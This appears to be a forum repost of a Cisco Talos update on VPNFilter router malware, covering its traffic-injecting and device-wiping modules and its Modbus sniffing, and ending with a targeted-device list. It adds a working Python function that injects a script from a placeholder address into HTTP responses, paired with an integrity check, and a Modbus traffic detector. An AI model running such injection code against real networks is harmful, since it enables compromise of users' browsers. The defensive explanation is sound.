I am re-posting info on VPNFilter. In 2018 security researchers around the globe sounded the alarm about the Russian hacker group APT28 (AKA Fancy Bear, the same ones who most likely hacked the 2016 U.S. presidential election). This group is purportedly responsible for a global attack called VPNFilter. The attack uses a global botnet of more than half a million routers and storage devices (and growing).

Sadly, and as has become the norm, businesses, and especially small businesses and home networks, fail to heed the warning and take action.

Cisco Talos, while working with our various intelligence partners, has discovered additional details regarding “VPNFilter.” In the days since we first published our findings on the campaign, we have seen that VPNFilter is targeting more makes/models of devices than initially thought, and has additional capabilities, including the ability to deliver exploits to endpoints. Talos recently published a blog about a broad campaign that delivered VPNFilter to small home-office network devices, as well as network-attached storage devices. As we stated in that post, our research into this threat was, and is, ongoing. In the wake of that post, we have had a number of partners step forward with additional information that has assisted us in our work. This post is an update of our findings over the past week.

First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected. We’ve provided an updated device list below.

We have also discovered a new stage 3 module that injects malicious content into web traffic as it passes through a network device. At the time of our initial posting, we did not have all of the information regarding the suspected stage 3 modules. The new module allows the actor to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user’s knowledge). With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports. We provide technical details on this module, named “ssler” below.

Additionally, we’ve discovered an additional stage 3 module that provides any stage 2 module that lacks the kill command the capability to disable the device. When executed, this module specifically removes traces of the VPNFilter malware from the device and then renders the device unusable. Analysis of this module, called “dstr,” is also provided below.

Finally, we’ve conducted further research into the stage 3 packet sniffer, including in-depth analysis of how it looks for Modbus traffic.
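The Talos text above says the "ssler" module lets the actor "inject malicious code" into web traffic passing through the router. This page does not describe how ssler itself is implemented, so the following is an added illustration (not Talos's code and not the malware's) of what a compromised gateway can do to cleartext HTTP, next to the endpoint-side check that catches it. The HTML page, the JSON response and the script address 198.51.100.10 (an RFC 5737 documentation address) are constructed placeholders. The injection only works on traffic the gateway can read; under TLS it sees ciphertext, which is why the mitigation is end-to-end integrity rather than trusting the network path.

```python
import hashlib

# Constructed sample traffic (not a real capture): what an origin server sends
# in the clear over HTTP/1.1, and a non-HTML response for comparison.
BODY = b"<html><body><h1>Router status</h1><p>All good.</p></body></html>"
ORIGINAL_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: text/html; charset=utf-8\r\n"
    b"Content-Length: " + str(len(BODY)).encode() + b"\r\n"
    b"\r\n"
) + BODY
JSON_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Content-Type: application/json\r\n"
    b"Content-Length: 13\r\n"
    b"\r\n"
    b'{"ok": true}\n'
)
# Placeholder payload an in-path attacker would add; 198.51.100.10 is a
# documentation address, not a real indicator.
INJECTED_SCRIPT = b'<script src="http://198.51.100.10/x.js"></script>'


def _split_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status line, header lines, body)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None  # no complete header block: not something we can rewrite
    lines = head.split(b"\r\n")
    return lines[0], lines[1:], body


def _header(headers, name: bytes):
    """Case-insensitive header lookup; returns the stripped value or None."""
    for h in headers:
        k, _, v = h.partition(b":")
        if k.strip().lower() == name:
            return v.strip()
    return None


def inject_into_http_response(raw: bytes, payload: bytes) -> bytes:
    """What an in-path device can do to cleartext HTML: insert `payload`
    before </body> and fix up Content-Length so the browser sees a valid
    response. Anything it cannot safely rewrite is passed through unchanged."""
    parts = _split_response(raw)
    if parts is None:
        return raw
    status, headers, body = parts
    ctype = _header(headers, b"content-type") or b""
    if not ctype.lower().startswith(b"text/html"):
        return raw
    # Compressed or chunked bodies would have to be decoded first; a proxy
    # usually avoids that by forcing Accept-Encoding: identity on the request.
    if _header(headers, b"content-encoding") or _header(headers, b"transfer-encoding"):
        return raw
    idx = body.lower().rfind(b"</body>")   # lower() keeps ASCII offsets intact
    if idx < 0:
        return raw
    new_body = body[:idx] + payload + body[idx:]
    new_headers = []
    for h in headers:
        if h.partition(b":")[0].strip().lower() == b"content-length":
            new_headers.append(b"Content-Length: " + str(len(new_body)).encode())
        else:
            new_headers.append(h)
    return status + b"\r\n" + b"\r\n".join(new_headers) + b"\r\n\r\n" + new_body


def body_sha256(raw: bytes) -> str:
    """SHA-256 of the response body only (headers are legitimately rewritten
    by caches and proxies, so they are not part of the integrity check)."""
    parts = _split_response(raw)
    body = parts[2] if parts else raw
    return hashlib.sha256(body).hexdigest()


def integrity_ok(raw: bytes, expected_sha256: str) -> bool:
    """Endpoint-side check: compare what arrived with a digest known
    out-of-band. This is the same idea as Subresource Integrity for scripts;
    TLS gives you the equivalent guarantee for the whole response."""
    return body_sha256(raw) == expected_sha256


# Digest the origin would publish (computed here from the constructed page).
EXPECTED_DIGEST = body_sha256(ORIGINAL_RESPONSE)

if __name__ == "__main__":
    tampered = inject_into_http_response(ORIGINAL_RESPONSE, INJECTED_SCRIPT)
    print(tampered.decode())
    print("original passes:", integrity_ok(ORIGINAL_RESPONSE, EXPECTED_DIGEST))
    print("tampered passes:", integrity_ok(tampered, EXPECTED_DIGEST))
```

The Content-Length fix-up is the detail worth noticing: a sloppy injector that forgets it produces truncated pages, while a careful one is invisible to the browser unless the content is verified end to end.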

If you want an idea of how VPNFilter works, here is a great article on the details.
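Returning to the Talos note above about the stage 3 packet sniffer and Modbus: the page does not say how that module matches Modbus traffic, so this is an added example (not the malware's code) of what identifying Modbus/TCP in a captured TCP stream involves, written in Python. Modbus/TCP uses the IANA-registered port 502 and a 7-byte MBAP header whose protocol id is always 0 and whose length field must match the bytes that follow it, which is enough to separate real Modbus from other traffic that happens to hit the port. The sample segments are constructed by hand, not taken from a capture, and the public function-code set is a heuristic (user-defined codes 65-72 and 100-110 are excluded).

```python
import struct

MODBUS_TCP_PORT = 502  # IANA-registered port for Modbus/TCP

# Public function codes from the Modbus Application Protocol spec: bit/register
# reads and writes, diagnostics, file/record access and encapsulated interface.
# Codes 65-72 and 100-110 are user-defined, so this check is a heuristic.
PUBLIC_FUNCTION_CODES = {1, 2, 3, 4, 5, 6, 7, 8, 11, 12, 15, 16, 17,
                         20, 21, 22, 23, 24, 43}


def parse_mbap(payload: bytes):
    """Validate a Modbus/TCP ADU: 7-byte MBAP header (transaction id,
    protocol id, length, unit id) followed by the PDU (function code + data).
    Returns (transaction_id, unit_id, function_code, data) or None."""
    if len(payload) < 8:                       # header plus at least a function code
        return None
    tid, pid, length, uid = struct.unpack(">HHHB", payload[:7])
    if pid != 0:                               # protocol id is always 0 for Modbus
        return None
    if length != len(payload) - 6:             # length counts unit id + PDU bytes
        return None
    if length > 254:                           # max ADU is 260 bytes
        return None
    fc = payload[7]
    if (fc & 0x7F) not in PUBLIC_FUNCTION_CODES:   # 0x80 bit marks an exception response
        return None
    return tid, uid, fc, payload[8:]


def is_modbus_segment(src_port: int, dst_port: int, payload: bytes) -> bool:
    """Port filter first (cheap), then structural validation of the payload."""
    if MODBUS_TCP_PORT not in (src_port, dst_port):
        return False
    return parse_mbap(payload) is not None


def find_modbus(segments):
    """segments: iterable of (src_port, dst_port, payload) as a sniffer would
    hand them over. Returns (transaction_id, unit_id, function_code) for
    every segment that parses as Modbus/TCP."""
    hits = []
    for src, dst, payload in segments:
        if not is_modbus_segment(src, dst, payload):
            continue
        tid, uid, fc, _ = parse_mbap(payload)
        hits.append((tid, uid, fc))
    return hits


# Constructed sample traffic (not a real capture).
READ_HOLDING_REQ = bytes.fromhex("0001 0000 0006 01 03 0000 000a")   # read 10 registers from unit 1
READ_HOLDING_RESP = bytes.fromhex("0001 0000 0017 01 03 14") + bytes(20)  # 20 bytes of register data
EXCEPTION_RESP = bytes.fromhex("0002 0000 0003 01 83 02")             # fc 3 exception: illegal data address
SAMPLE_SEGMENTS = [
    (50412, 502, READ_HOLDING_REQ),
    (502, 50412, READ_HOLDING_RESP),
    (50413, 502, EXCEPTION_RESP),
    (50414, 502, b"GET / HTTP/1.1\r\nHost: plc\r\n\r\n"),            # wrong protocol on port 502
    (50415, 80, READ_HOLDING_REQ),                                   # Modbus bytes on a non-Modbus port
    (50416, 502, bytes.fromhex("0003 0000 0009 01 03 0000 000a")),   # length field does not match
]

if __name__ == "__main__":
    for tid, uid, fc in find_modbus(SAMPLE_SEGMENTS):
        kind = "exception" if fc & 0x80 else "request/response"
        print(f"modbus tid={tid} unit={uid} fc={fc & 0x7F} ({kind})")
```

The same validation, run on an egress tap rather than on the router, is a reasonable detection: a home or branch-office gateway normally has no business seeing Modbus at all, so any hit is worth an alert.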

Here is the list of devices known to be targeted by VPNFilter, as published in the Talos update above. Note that it lists models the actor has been seen targeting, not every model that may be exploitable.

List of known devices targeted by VPNFilter

Asus devices: RT-AC66U, RT-N10, RT-N10E, RT-N10U, RT-N56U, RT-N66U

D-Link devices: DES-1210-08P, DIR-300, DIR-300A, DSR-250N, DSR-500N, DSR-1000, DSR-1000N

Huawei devices: HG8245

Linksys devices: E1200, E2500, E3000, E3200, E4200, RV082, WRVS4400N

MikroTik devices: CCR1009, CCR1016, CCR1036, CRS109, CRS112, CRS125, RB411, RB450, RB750, RB911, RB921, RB941, RB951, RB952, RB960, RB962, RB1100, RB Groove, RB Omnitik

Netgear devices: DG834, DGN1000, DGN2200, FVS318N, MBRN3000, R6400, R7000, R8000, WNR1000, WNR2000, WNR2200, WNR4000, WNDR3700, WNDR4000, WNDR4300, WNDR4300-TN, UTM50

QNAP devices: TS251, TS439 Pro, other QNAP NAS devices running QTS software

TP-Link devices: R600VPN, TL-WR741ND, TL-WR841N

Ubiquiti devices: NSM2, PBE M5

Upvel devices: unknown models*

ZTE devices: ZXHN H108N